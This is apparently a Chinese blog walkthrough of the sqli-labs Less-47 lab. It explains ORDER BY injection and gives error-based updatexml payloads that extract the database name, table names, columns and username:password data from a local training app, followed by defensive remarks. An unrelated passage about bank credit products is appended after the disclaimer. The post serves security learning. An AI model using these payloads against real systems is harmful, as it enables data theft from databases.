sqli-labs:Less-47关卡详细解析

1. 思路🚀

本关的SQL语句为:

$id=$_GET['sort'];	
$sql = "SELECT * FROM users ORDER BY '$id'";
  • 注入类型:字符串型(单引号包裹)、GET请求
  • 提示:参数需以'闭合
  • 关键参数:sort

本关卡的重点依旧是Order By注入和基于Rand()的注入:

  • order by 注入:发生在 SQL 查询的排序参数直接拼接用户输入时,攻击者通过控制排序字段实现数据泄露或盲注。
  • 基于rand()的注入:利用 rand() 函数的随机性,通过条件控制排序结果差异,实现盲注。

关卡不能使用联合查询注入,因为union select不能在order by之后,这样的SQL语句不成立。可以通过报错盲注、搭配rand()函数的布尔盲注和时间盲注解决。关于布尔盲注和时间盲注会在关卡48做详细解析,关于order byrand()函数的介绍见关卡46,本关卡使用报错盲注。

代码片段:报错盲注

else
{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
}

在这里插入图片描述


2. 报错盲注步骤🎯

我的地址栏是:http://localhost:8081/Less-48/,只需要将下面的sql语句粘贴即可。

2.1. 获取基本信息⚡

?sort=1' and updatexml(1,concat(1,database()),3) --+

在这里插入图片描述


2.2. 获取表名⚡

?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3) --+

在这里插入图片描述


2.3. 获取字段⚡

?sort=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security'and table_name='users')),3) --+

在这里插入图片描述


2.4. 获取数据⚡

?sort=1' and updatexml(1,concat(1,(select substring(group_concat(username,':',password),1,30) from users)),3) --+

在这里插入图片描述


3. 总结🏁

  • Order By注入:通过控制排序参数执行恶意SQL,泄露数据或绕过权限,需严格校验排序字段。

  • 基于Rand()的注入:利用rand()的确定性差异实现盲注,固定种子可触发条件判断,需禁用动态排序或白名单控制。

  • 报错盲注:通过报错函数(如updatexml())强制返回数据库信息,需过滤特殊字符或禁用报错回显。

关于order byrand()函数的介绍见:“sqli-labs:Less-46关卡详细解析”
https://blog.csdn.net/qq_62000508/article/details/149966834?spm=1011.2415.3001.5331

结合布尔盲注的关卡解析见:“sqli-labs:Less-48关卡详细解析”
https://blog.csdn.net/qq_62000508/article/details/149971453?spm=1011.2415.3001.5331


声明:本文仅用于安全学习,严禁非法测试! ❗❗❗

源码链接: https://pan.quark.cn/s/a4b39357ea24 银行信贷业务作为银行业务的键构成部分,涵盖了银行向客户提供的各类融资服务,例如贷款、担保以及信用证等。此类业务致力于协助企业与个人解决资金需求问题,进而推动经济活动的开展。银行通过信贷业务获取利息收入,同时需承担相应风险,以保障资金的稳定与流转。 **信贷定义** 信贷意味着银行运用自身资本及信誉为客户提供资金支持,而客户则需以支付利息、费用并偿还本金为前提条件。这种业务模式不仅包含直接贷款,还包括为客户的债务承担提供担保。依照会计准则,信贷业务可分为表内业务与表外业务,前者对银行的资产负债表产生直接影响,后者则不直接联。 **信贷业务划分标准** 1. **依据会计核算归属**:表内信贷(如贷款、贴现)和表外信贷(如承兑、保证)。 2. **根据期限划分**:短期(不超过1年)、中期(1至5年)与长期(超过5年)。 3. **按照担保方式分类**:信用信贷(无担保)和担保信贷(保证、抵押、质押)。 4. **按照币种区分**:本币信贷与外币信贷。 5. **按照性质和用途区分**:固定资产贷款、流动资金贷款、循环额度贷款、消费贷款等。 6. **按照贷款组织形式区分**:普通贷款、联合贷款和银团贷款。 7. **按照资金来源区分**:信贷资金贷款、委托贷款和境外筹资转贷款。 8. **按照授信对象区分**:公司类信贷与个人类信贷。 **信贷业务产品** 1. **流动资金贷款**:用于企业日常运营周转或临时性资金需求。 2. **固定资产贷款**:用于投资固定资产项目。 3. **房地产开发贷款**:用于土地开发及房屋建设所需资金。 4. **循环额度贷款**:满足企业...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值